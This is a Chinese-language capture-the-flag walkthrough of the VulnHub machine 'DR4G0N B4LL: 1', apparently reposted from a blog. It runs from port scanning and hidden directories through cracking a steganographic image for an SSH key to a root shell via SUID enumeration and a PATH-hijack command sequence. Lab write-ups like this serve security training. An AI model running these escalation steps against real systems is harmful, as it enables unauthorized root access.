Vulnhub渗透测试 DR4G0N B4LL: 1

项目地址:Dr4g0n b4ll: 1 ~ VulnHub


前期信息收集

使用Nmap 进行主机发现  

 使用Nmap 进行端口扫描

目标开启ssh(22)、http(80)

在页面源代码中发现提示

多次base解码后为 DRAGON BALL

 

使用Dirscan目录扫描 发现robots.txt

 

base64解码为 you find the hidden dir (找到隐藏的目录)

根据前面源码提示 访问http://192.168.234.157/DRAGON BALL/

secret.txt 里逐个测试发现都无效;直接进入Vulnhub目录

有张图片和login.html

 

 

 

 发现用户名 xmen

将图片下载到Kali

wget http://192.168.234.157/DRAGON%20BALL/Vulnhub/aj.jpg

图片猜测为steg隐写,使用 steghide 发现需要密码

steghide extract -sf aj.jpg 

 网上收集一波资料发现可以使用 stegcracker 破解密码

 得到 id_rsa 结合前面收集的用户xmen 可以尝试ssh连接

赋予id_rsa 权限

chmod 600 id_rsa

 ssh登录

ssh [email protected] -i id_rsa

 可以发现一个Flag

提权

尝试SUID提权

find / -perm -u=s -type f 2>/dev/null

 

发现家目录下可疑文件

执行shell文件会运行ps

直接修改 环境变量

 

cd /tmp
echo "/bin/bash" > ps
chmod +x ps
export PATH=/tmp:$PATH
which ps

 执行shell即可获得Root权限


本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇
下一篇>>